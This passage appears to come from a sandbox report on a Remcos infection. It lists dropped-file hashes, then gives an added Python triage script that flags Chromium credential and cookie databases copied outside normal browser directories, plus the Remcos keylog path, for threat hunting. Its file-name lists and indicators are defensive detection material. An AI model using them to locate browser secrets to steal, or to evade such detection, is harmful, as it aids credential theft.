SHA1 0b9b19ca4bae50d14e284d9a4968f8426932b787
SHA256 dd46df74499fbec20150154b60ab83b53b76e5c12388f96cd812650388a45da2
SHA512 7085f7374646e59e5748cf2f87b07e4dba706cf3b4d4aa4cef9c7fe06a78d1d4a10c9e132201a1f77d5f7b5c87f652b87dd4bf90b933bc0f1eb33415e215d20c

C:\ProgramData\remcos\logs.dat

MD5 603c41ffecff412d9821a7f4ed2276e5
SHA1 25cddc919515fc1b93a9c99de9c36fc81cf6ec66
SHA256 0abdd57c92430d5fb4e14a257b8a4e404921a9b8a2a44ea225f59c2d36a77e7d
SHA512 b9dbaccdc42253c0b40e69f354fdf90149128efcc0c4a0719dfc93a9493565579b9b370965e9242b0d220f41e8f10befa2fdc45b8028420796922ac50c93ea2b
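The listing above is what a responder turns into a hunt: a complete Chromium profile (Local State, Login Data, Web Data, History, Preferences, Secure Preferences and the supporting LevelDB and cache files) written under Temp\TmpUserData instead of under a browser's own User Data directory, plus the Remcos log at C:\ProgramData\remcos\logs.dat. The script below is an added example, not part of the report or of the sandbox's tooling. It parses entries in the format used here (a path line followed by MD5/SHA1/SHA256/SHA512 lines), flags sensitive Chromium profile files that sit outside the canonical profile roots and the Remcos log, and collects their SHA256 values and the foreign profile directory for a hunt list. The set of legitimate profile roots, the finding labels and the final sample entry (a profile file in its normal Edge location with placeholder hashes) are assumptions made for the example; the other sample entries are copied from the listing above.

```python
"""Triage helper for a sandbox report's dropped-file listing (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Chromium profile files holding saved logins, cookies, autofill data or the
# DPAPI-wrapped key ("Local State") needed to decrypt them.
SENSITIVE_NAMES = {"Login Data", "Web Data", "Cookies", "History",
                   "Local State", "Secure Preferences", "Preferences"}

# Assumed list of directories where Chromium-based browsers legitimately keep a
# profile (lower-cased). A sensitive file outside these roots is a copied profile.
LEGIT_PROFILE_ROOTS = (
    "\\appdata\\local\\google\\chrome\\user data\\",
    "\\appdata\\local\\microsoft\\edge\\user data\\",
    "\\appdata\\local\\bravesoftware\\brave-browser\\user data\\",
)

HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")


@dataclass
class FileEntry:
    path: str
    hashes: Dict[str, str] = field(default_factory=dict)

    @property
    def name(self) -> str:
        return self.path.rsplit("\\", 1)[-1]

    @property
    def profile_root(self) -> str:
        """Directory the profile lives in: the part above \\Default\\, or the
        parent directory for top-level files such as Local State."""
        if "\\Default\\" in self.path:
            return self.path.split("\\Default\\", 1)[0]
        return self.path.rsplit("\\", 1)[0]


def parse_listing(text: str) -> List[FileEntry]:
    """Turn path + hash lines into FileEntry records, in listing order."""
    entries: List[FileEntry] = []
    current: Optional[FileEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m is None:                     # any non-hash line is a new path
            current = FileEntry(path=line)
            entries.append(current)
        elif current is not None:         # hash lines before any path are dropped
            current.hashes[m.group(1)] = m.group(2).lower()
    return entries


def classify(entry: FileEntry) -> Optional[str]:
    """Return a finding label for an entry, or None if it looks benign."""
    lowered = entry.path.lower()
    if lowered.endswith("\\remcos\\logs.dat"):
        return "remcos_keylog"
    if entry.name in SENSITIVE_NAMES:
        if any(root in lowered for root in LEGIT_PROFILE_ROOTS):
            return None                   # in place: ordinary browser activity
        return "browser_profile_copied"
    return None


def triage(text: str) -> Dict[str, List[str]]:
    """Group SHA256s and copied-profile directories by finding."""
    out: Dict[str, List[str]] = {"browser_profile_copied": [],
                                 "remcos_keylog": [],
                                 "copied_profile_roots": []}
    for entry in parse_listing(text):
        label = classify(entry)
        if label is None:
            continue
        sha = entry.hashes.get("SHA256")
        if sha and sha not in out[label]:
            out[label].append(sha)
        if label == "browser_profile_copied":
            root = entry.profile_root
            if root not in out["copied_profile_roots"]:
                out["copied_profile_roots"].append(root)
    return out


# Sample input: four entries copied from the listing above (some SHA1/SHA512
# lines omitted; the parser accepts any subset) plus one constructed entry for
# a profile file in its normal Edge location, with placeholder hashes.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 3d2d0e92d8a651c6ab2ff89573cb2387
SHA256 66e59a07892dcef395d533d84d972c6e56771b6976c8e8c3699d20d68fc4bf1e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

MD5 4ba10349f3befe34968f7ca4437aafd7
SHA256 e2eac33c29c3d6c7bbc4fd7a142c372712606bad72a416da9ec7f56b3d29a83c

C:\ProgramData\remcos\logs.dat

MD5 603c41ffecff412d9821a7f4ed2276e5
SHA256 0abdd57c92430d5fb4e14a257b8a4e404921a9b8a2a44ea225f59c2d36a77e7d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

MD5 00000000000000000000000000000000
SHA256 0000000000000000000000000000000000000000000000000000000000000000
"""

if __name__ == "__main__":
    for label, values in triage(SAMPLE).items():
        print(label, *values, sep="\n    ")
```

Run it against the whole Files section of a report and the "copied_profile_roots" value gives the directory to sweep for on other hosts; the SHA256 values of the profile databases are host-specific and are mostly useful for confirming what was staged, while the Remcos log path and the foreign profile directory are the portable indicators. Note that the report lists Default\Preferences twice with different hashes because the file was rewritten during the run; the parser keeps both records and triage() deduplicates only identical hashes.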